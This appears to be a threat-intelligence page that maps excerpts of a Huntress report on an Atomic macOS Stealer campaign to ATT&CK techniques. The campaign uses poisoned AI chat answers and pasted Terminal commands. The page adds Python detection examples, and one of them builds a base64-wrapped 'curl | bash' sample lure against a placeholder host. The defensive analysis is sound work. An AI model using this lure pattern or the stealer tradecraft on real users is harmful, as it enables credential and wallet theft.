“session-specific credential stores, browser databases, and authenticated application data that are unavailable to background daemons without visible re-authentication. By minimizing reliance on traditional plist-based persistence and maintaining user-context relaunching, …”
T1059.004 Unix Shell (85%)
“…uishable from the help it impersonates. What happens after the copy-paste: once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the terminal command decoded to a URL hosting a malicious bash script, the first stage of an a…”
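The decode step that excerpt describes (a base64 string inside a pasted Terminal command that unwraps to a URL hosting a first-stage bash script), written here as an added triage example in Python; it is not Huntress's code and not the campaign's actual lure. The sample command, the two-layer nesting and the placeholder URL under the reserved `.invalid` TLD are constructed for the example, and the token and pipe-to-shell patterns are this example's own heuristics.

```python
import base64
import binascii
import re

# Constructed sample lure, shaped like the excerpt's command: a base64 blob
# piped through base64 -d into a shell. It is two layers deep so the
# recursive unwrapping below has something to do. The URL is a placeholder
# under the reserved .invalid TLD, not a real payload host.
STAGE1_URL = "http://example.invalid/stage1.sh"
_INNER = f'curl -fsSL "{STAGE1_URL}" | bash'
_OUTER = "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -d | sh"
SAMPLE_COMMAND = "echo " + base64.b64encode(_OUTER.encode()).decode() + " | base64 -d | bash"

# A run of base64 alphabet long enough not to be an ordinary word, with
# optional padding; short words like "bash" or "base64" never match.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s\"'|;&<>]+")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:ba|z|da)?sh\b")


def decode_b64_tokens(command: str) -> list[str]:
    """Decode every base64-looking token in a command to text.

    Tokens that are not valid base64, or that decode to binary rather than
    text (a hex digest of 16+ chars is in the alphabet but decodes to junk),
    are skipped so triage continues past them.
    """
    decoded = []
    for tok in B64_TOKEN.findall(command):
        padded = tok + "=" * (-len(tok) % 4)  # tolerate stripped '=' padding
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def triage_pasted_command(command: str) -> dict:
    """Unwrap a pasted command layer by layer and summarise what it does.

    Returns the decoded layers in the order they were unwrapped, every URL
    seen in the command or any layer, and whether any layer pipes into a
    shell. Unwrapping is recursive, which goes one step past the single
    base64 layer the excerpt describes.
    """
    layers: list[str] = []
    pending = [command]
    seen: set[str] = set()
    while pending:
        current = pending.pop()
        if current in seen:
            continue
        seen.add(current)
        for inner in decode_b64_tokens(current):
            layers.append(inner)
            pending.append(inner)
    texts = [command, *layers]
    urls = sorted({u for t in texts for u in URL.findall(t)})
    return {
        "layers": layers,
        "urls": urls,
        "pipe_to_shell": any(PIPE_TO_SHELL.search(t) for t in texts),
    }


if __name__ == "__main__":
    report = triage_pasted_command(SAMPLE_COMMAND)
    for depth, layer in enumerate(report["layers"], 1):
        print(f"layer {depth}: {layer}")
    print("urls:", report["urls"])
    print("pipe-to-shell:", report["pipe_to_shell"])
```

The decoded layers are what a blocklist or detection rule should key on; the outer base64 string is trivial for an attacker to re-encode, so matching on it buys little.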
T1543.004 Launch Daemon (84%)
“. Additionally, an app bundle resource is included that posts this data to the attacker-controlled web server. Figure 7: the AppleScript checks for Ledger Wallet and Trezor Suite and replaces them with a trojanized version. The stealer is compiled as a native macOS binary, not …”
T1543.001 Launch Agent (74%)
“. Additionally, an app bundle resource is included that posts this data to the attacker-controlled web server. Figure 7: the AppleScript checks for Ledger Wallet and Trezor Suite and replaces them with a trojanized version. The stealer is compiled as a native macOS binary, not …”
T1204.004 Malicious Copy and Paste (73%)
“AI-Poisoning & AMOS Stealer: The Biggest Mac Threat | Huntress. Summary: On December 5, 2025, Huntress triaged an Atomic macOS Stealer (AMOS) alert that initially appeared routine: data exfiltration, standard AMOS persistence, and no unusual infection chain indicators in the …”
T1059.002 AppleScript (73%)
“execute. Before executing the next stage, it will verify that it is not running in a virtual machine and instead will run anti-VM logic. Figure 6: anti-VM logic to ensure the malware is not running inside a virtual machine. Stage 2: loader and payload deployment with authori…”
T1059.004 Unix Shell (72%)
“and runs a bash script that requests the user's credentials by simply asking for the "system password". Once entered, the AMOS stealer looks to verify the password supplied by the victim. Figure 5: the bash script used to escalate to root. The password prompt is not an actual…”
T1543.004 Launch Daemon (61%)
“…daemon called `com.finder.helper.plis`. The LaunchDaemon's responsibility is to run this hidden .agent script — an AppleScript-based watchdog loop that runs in the background. This .agent file was initially dropped as part of the first-stage dropper, an AppleScript call…”
T1566.002 Spearphishing Link (58%)
“AI-Poisoning & AMOS Stealer: The Biggest Mac Threat | Huntress. Summary: On December 5, 2025, Huntress triaged an Atomic macOS Stealer (AMOS) alert that initially appeared routine: data exfiltration, standard AMOS persistence, and no unusual infection chain indicators in the …”
T1555 Credentials from Password Stores (56%)
“session-specific credential stores, browser databases, and authenticated application data that are unavailable to background daemons without visible re-authentication. By minimizing reliance on traditional plist-based persistence and maintaining user-context relaunching, …”
T1555.003 Credentials from Web Browsers (54%)
“session-specific credential stores, browser databases, and authenticated application data that are unavailable to background daemons without visible re-authentication. By minimizing reliance on traditional plist-based persistence and maintaining user-context relaunching, …”
T1566 Phishing (45%)
“AI-Poisoning & AMOS Stealer: The Biggest Mac Threat | Huntress. Summary: On December 5, 2025, Huntress triaged an Atomic macOS Stealer (AMOS) alert that initially appeared routine: data exfiltration, standard AMOS persistence, and no unusual infection chain indicators in the …”
T1059.004 Unix Shell (45%)
“…ing an application or DMG, victims compromise themselves by copying a command directly from the browser into Terminal. Detection and mitigation recommendations: traditional signature-based detection will struggle with this campaign because the initial infection vector, a use…”
T1059.002 AppleScript (42%)
“…ing an application or DMG, victims compromise themselves by copying a command directly from the browser into Terminal. Detection and mitigation recommendations: traditional signature-based detection will struggle with this campaign because the initial infection vector, a use…”
T1059.002 AppleScript (40%)
“and runs a bash script that requests the user's credentials by simply asking for the "system password". Once entered, the AMOS stealer looks to verify the password supplied by the victim. Figure 5: the bash script used to escalate to root. The password prompt is not an actual…”
T1204.004 Malicious Copy and Paste (39%)
“why we initially expected to find a user-executed command lure instead of a file-based delivery vector. Instead, what we found was a simple Google search, followed by a conversation with ChatGPT: the victim had searched "clear disk space on macOS." Google surfaced two high…”
T1059.004 Unix Shell (38%)
“background, no system UI, no Touch ID fallback, no visible authentication challenge. Once a valid password is supplied, the script writes it in plaintext to a hidden file in the /tmp directory, called /tmp/.pass. Once it moves to the next stage, it will move the file to the u…”
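A host-side hunt for the two on-disk artifacts the excerpts describe, the LaunchDaemon that runs a hidden `.agent` AppleScript (the `com.finder.helper` entry above) and the plaintext password staged at `/tmp/.pass` (this entry), written here as an added example in Python; it is not Huntress's tooling and not the malware's own code. The fixture it scans is constructed: the plist label, the `osascript` invocation, the location of `.agent` under the victim's home directory and the staged password value are this example's assumptions, and only the plist name, the hidden `.agent` script and `/tmp/.pass` come from the excerpts. The scan takes a root path so it works on a live volume (`/`) or a mounted forensic image.

```python
import plistlib
import tempfile
from pathlib import Path
from xml.parsers.expat import ExpatError

# Where launchd reads persistence plists, relative to the scan root.
SYSTEM_PLIST_DIRS = ("Library/LaunchDaemons", "Library/LaunchAgents")


def hidden_script_args(plist_path: Path) -> list[str]:
    """Return every dot-prefixed (Finder-hidden) path that a launchd plist's
    Program/ProgramArguments would execute or pass to an interpreter."""
    try:
        with plist_path.open("rb") as fh:
            data = plistlib.load(fh)
    except (plistlib.InvalidFileException, ExpatError, OSError):
        return []  # unreadable or malformed plist: nothing to extract here
    args = list(data.get("ProgramArguments", []))
    if isinstance(data.get("Program"), str):
        args.append(data["Program"])
    return [a for a in args if isinstance(a, str) and Path(a).name.startswith(".")]


def launchd_plist_dirs(root: Path):
    """System-wide daemon/agent directories plus each user's LaunchAgents."""
    for rel in SYSTEM_PLIST_DIRS:
        yield root / rel
    users = root / "Users"
    if users.is_dir():
        for home in sorted(users.iterdir()):
            yield home / "Library" / "LaunchAgents"


def hunt(root: Path) -> list[dict]:
    """Hunt a scan root for a launchd job that runs a hidden script and for a
    plaintext password staged in /tmp/.pass. Returns one dict per finding."""
    findings = []
    for directory in launchd_plist_dirs(root):
        if not directory.is_dir():
            continue
        for plist in sorted(directory.glob("*.plist")):
            for hidden in hidden_script_args(plist):
                # Resolve the referenced script inside the scan root so an
                # image mounted elsewhere is checked, not the analyst's host.
                on_disk = (root / hidden.lstrip("/")).is_file()
                findings.append({
                    "kind": "launchd_hidden_script",
                    "plist": str(plist.relative_to(root)),
                    "script": hidden,
                    "script_present": on_disk,
                })
    staged = root / "tmp" / ".pass"
    if staged.is_file():
        findings.append({
            "kind": "plaintext_password_staging",
            "path": str(staged.relative_to(root)),
            "bytes": staged.stat().st_size,
        })
    return findings


def build_sample_root() -> Path:
    """Constructed fixture, not real malware output: a fake volume with one
    launchd plist that runs a hidden .agent script via osascript (assumed
    shape), one benign plist, the hidden script itself, and a staged
    /tmp/.pass holding a made-up password."""
    root = Path(tempfile.mkdtemp(prefix="amos-hunt-"))
    daemons = root / "Library" / "LaunchDaemons"
    daemons.mkdir(parents=True)
    with (daemons / "com.finder.helper.plist").open("wb") as fh:
        plistlib.dump({
            "Label": "com.finder.helper",
            "RunAtLoad": True,
            "ProgramArguments": ["/usr/bin/osascript", "/Users/victim/.agent"],
        }, fh)
    with (daemons / "com.vendor.updater.plist").open("wb") as fh:
        plistlib.dump({
            "Label": "com.vendor.updater",
            "ProgramArguments": ["/Library/Vendor/updater", "--check"],
        }, fh)
    home = root / "Users" / "victim"
    home.mkdir(parents=True)
    # Placeholder standing in for the AppleScript watchdog loop.
    (home / ".agent").write_text("repeat\n  delay 5\nend repeat\n")
    (root / "tmp").mkdir()
    (root / "tmp" / ".pass").write_text("hunter2\n")
    return root


if __name__ == "__main__":
    for finding in hunt(build_sample_root()):
        print(finding)
```

The benign `com.vendor.updater` plist is there to show the check keys on a hidden-file argument, not on the mere presence of a daemon; `script_present` distinguishes a job whose script is still on disk from one whose payload has already moved on.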
T1553.001 Gatekeeper Bypass (35%)
“servers. Threat actor evolution: this campaign highlights several meaningful shifts in macOS stealer tradecraft. Two key delivery traits differentiate this campaign from traditional macOS stealer deployment. - AI trust exploitation - attackers mimic the tone, formatting, and instru…”
Summary
Attackers are exploiting user trust in AI and aggressive SEO to deliver an evolved Atomic macOS Stealer. Learn why this social engineering tradecraft bypasses traditional network controls and the future of macOS infostealer defense.